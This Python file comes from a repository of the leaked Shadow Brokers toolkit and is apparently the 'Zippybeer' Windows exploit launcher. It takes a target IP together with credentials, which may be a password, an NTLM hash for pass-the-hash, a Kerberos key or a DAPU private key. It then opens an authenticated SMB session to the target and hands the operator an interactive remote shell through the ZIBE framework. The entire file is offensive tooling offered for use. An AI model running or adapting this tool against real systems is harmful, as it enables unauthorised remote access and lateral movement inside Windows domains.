shadowbrokers-exploits/windows/exploits/Zippybeer-1.0.2.py
2017-04-14 11:45:07 +02:00

236 lines
12 KiB
Python

#!/usr/bin/env python
# -*- Coding: UTF-8 -*-
import sys
import binascii
import logging
from ZIBE import logs, zbutil
from ZIBE.context_mgr import ContextManager, ZIBEException
from ZIBE.shell import ZIBEShell
from optparse import OptionParser
import os
if os.name == "nt":
sep = ';'
else:
sep = ":"
for v in os.environ['PATH'].split(sep):
sys.path.append(v)
__logo__ = '''
.sssssssss.
.ssssssssssssssssss
sssssssssssssssssssssss
sssssssssssssssssssssssssss
@@sssssssssssssssssssssss@ss
|s@@@@sssssssssssssss@@@@s|s
_____|sssss@@@@@sssss@@@@@sssss|s
/ sssssssss@sssss@sssssssss|s
/ .----+.ssssssss@sssss@ssssssss.|
/ / |...sssssss@sss@sssssss...|
| | |.......sss@sss@ssss......|
| | |..........s@ss@sss.......|
| | |...........@ss@..........|
\ \ |............ss@..........|
\ , +...........ss@...........|
\______ .........................|
| ........................|
/...........................\\
|.............................|
|.......................|
|...............|
'''
class ZIBEOptionParser(OptionParser):
def __init__(self):
OptionParser.__init__(self)
self.add_option('--TargetIp', help='IP Address of Target Machine', dest="TargetIp")
self.add_option('--TargetPort', help='Port of Target Machine', dest="TargetPort", default=445, type='int')
self.add_option('--NetworkTimeout', help='Timeout for networking calls', dest="NetworkTimeout", default=60, type='int')
self.add_option('--TargetEPMPort', help='Port of Target Machine', dest="TargetEPMPort", default=135, type='int')
self.add_option('--CredentialType', help='Type of credential provided', dest="CredentialType", default="UsernamePassword")
self.add_option('--Username', help='Account Username', dest="Username")
self.add_option('--Credential', help='Account Password', dest="Credential")
self.add_option('--Domain', help='Account Domain', dest="Domain", default=None)
# Kerberos options
self.add_option("--UseESRO", action="store_true", dest="UseESRO")
self.add_option('--KerbCredentialType', help="The type of credential to use when performing the kerberos authentication", dest='KerbCredentialType')
self.add_option('--TargetNetbiosName', help="NETBIOS name of the target computer", dest='TargetNetbiosName')
self.add_option('--TargetDcIp', help="Domain Controller's IP address", dest='TargetDcIp')
self.add_option('--TargetDcKerberosPort', help="Port used by the Kerberos service", dest='TargetDcKerberosPort', default=88, type='int')
self.add_option('--TargetDcSMBPort', help="Port used by the Kerberos service", dest='TargetDcSMBPort', default=445, type='int')
# DAPU Options
self.add_option('--PrivateKey', help='DAPU Private Key', dest="PrivateKey")
# Usability options
self.add_option('--TabCompletion', help='Disable tab completion, which uses more network traffic, and may be painful over slow networks',
dest="TabCompletion")
try:
sys.path.append(os.path.abspath(os.path.join(os.environ['FBDIR'], "fuzzbunch")))
from coli import CommandlineWrapper
except Exception as e:
print "Fuzzbunch directory not registered. Using command line arguments"
class CommandlineWrapper(object):
def __call__(self, args):
print "Called local commandlinewrapper"
d = {}
context = {}
self.processParams(args, None, d, context, logs.get_logger('debug.log'))
class ZIBE(CommandlineWrapper):
def __init__(self):
CommandlineWrapper.__init__(self)
self.parser = ZIBEOptionParser()
self.opts = None
self.args = None
def __del__(self):
pass
def validateParams(self, params):
return True
def cleanup(self, flags, context, logConfig):
return
def getID(self):
return "b7bc209584db8d06d97dd5a6fa8b2453a93aa94a"
def processParams(self, inputs, constants, outputs, context, logConfig):
# As a bi-product of the way we do things, we need to remove
# the StreamHandler from the logConfig we receive
for l in logConfig.handlers:
if not isinstance(l, logging.FileHandler):
logConfig.removeHandler(l)
try:
options, args = self.parser.parse_args(inputs)
if options.TargetIp == "" or options.TargetPort > 65535:
print("IP/port are invalid")
return
if options.CredentialType not in ['UsernamePassword', 'PasswordHash', 'Kerberos', 'DAPU']:
print("Invalid credential type. ")
return
except:
self.parser.print_usage()
return
print "[+] TargetIp: %s" % (options.TargetIp)
print "[+] TargetPort: %d" % (options.TargetPort)
mgr = ContextManager()
ctx = mgr.create_context("UselessContextName", options.TargetIp, options.TargetPort, options.TargetEPMPort)
print "[+] CredentialType: %s" % (options.CredentialType)
try:
if options.CredentialType in ['UsernamePassword', 'PasswordHash']:
domain = options.Domain or '\\' in options.Username
try:
if options.CredentialType == 'UsernamePassword' and domain:
ctx.provider( ctx.PROVIDER_NTLM_DOMAIN )
if options.Domain:
ctx.domain(options.Domain)
ctx.username( zbutil.arg_to_utf8(options.Username) )
ctx.password( zbutil.arg_to_utf8(options.Credential) )
print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))
print "[+] Credential: %s" % (zbutil.arg_to_utf8(options.Credential))
elif options.CredentialType == 'UsernamePassword' and not domain:
ctx.provider( ctx.PROVIDER_NTLM_PLAINTEXT )
ctx.username( zbutil.arg_to_utf8(options.Username) )
ctx.password( zbutil.arg_to_utf8(options.Credential) )
print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))
print "[+] Credential: %s" % (zbutil.arg_to_utf8(options.Credential))
elif options.CredentialType == 'PasswordHash' and domain:
ctx.provider( ctx.PROVIDER_NTLM_DOMAIN_HASH )
if options.Domain:
ctx.domain(options.Domain)
ctx.username( zbutil.arg_to_utf8(options.Username) )
ctx.password_hash(binascii.unhexlify(options.Credential))
print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))
print "[+] Password Hash: %s" % (options.Credential)
elif options.CredentialType == 'PasswordHash' and not domain:
ctx.provider( ctx.PROVIDER_NTLM_PWHASH )
ctx.username( zbutil.arg_to_utf8(options.Username) )
ctx.password_hash(binascii.unhexlify(options.Credential))
print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))
print "[+] Password Hash: %s" % (options.Credential)
except Exception as e:
print("Unable to parse username or password: %s" % (e))
return
elif options.CredentialType == 'Kerberos':
if options.KerbCredentialType not in ['Password', 'PasswordHash']:
print("Invalid Kerberos credential type (--KerbCredentialType)")
return
if not options.TargetDcIp or options.TargetDcIp == "":
print("Invalid domain controller IP address")
return
if not options.TargetNetbiosName or options.TargetNetbiosName == "":
print("TargetNetbiosName is required")
return
print "[+] TargetDcIp: %s" % (options.TargetDcIp)
print "[+] TargetDcPort: %s" % (options.TargetDcKerberosPort)
print "[+] TargetDcSMBPort: %s" % (options.TargetDcSMBPort)
print "[+] TargetNetbiosName: %s" % (zbutil.arg_to_utf8(options.TargetNetbiosName))
print "[+] KerbCredentialType: %s" % (options.KerbCredentialType)
print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))
if options.KerbCredentialType == 'Password':
if options.UseESRO:
ctx.provider( ctx.PROVIDER_ESRO_PLAINTEXT )
else:
ctx.provider( ctx.PROVIDER_KERB_PLAINTEXT )
ctx.password(zbutil.arg_to_utf8(options.Credential))
print "[+] Password: %s" % (zbutil.arg_to_utf8(options.Credential))
else: # Password Hash
if options.UseESRO:
ctx.provider( ctx.PROVIDER_ESRO_HASH )
else:
ctx.provider( ctx.PROVIDER_KERB_HASH )
try:
ctx.password_hash(binascii.unhexlify( options.Credential ))
print "[+] PasswordHash: %s" % (options.Credential)
except TypeError as e:
print("Invalid password hash. Password must be encoded using binhex representation")
print(str(e))
ctx.kdc_location( options.TargetDcIp, options.TargetDcKerberosPort, options.TargetDcSMBPort )
ctx.target_name( zbutil.arg_to_utf8(options.TargetNetbiosName))
ctx.username(zbutil.arg_to_utf8(options.Username))
elif options.CredentialType == 'DAPU':
ctx.provider( ctx.PROVIDER_DAPU )
ctx.dp_key( binascii.unhexlify( options.PrivateKey))
else:
print("Invalid Authentication mechanism")
return
except Exception, e:
print("Error when parsing parameters: " + str(e) )
import traceback
print(traceback.format_exc())
return
try:
ctx.start_session()
except ZIBEException, err:
print("Failed to start ZIBE session: " + str(err) )
return
print(__logo__)
if options.TabCompletion:
shell = ZIBEShell(context=ctx, logger=logConfig)
else:
shell = ZIBEShell(context=ctx, completekey=None, logger=logConfig)
shell.cmdloop(intro="ZIBE Interactive Shell")
mgr.release_context(ctx)
if __name__ == "__main__":
z = ZIBE()
z(sys.argv[1:])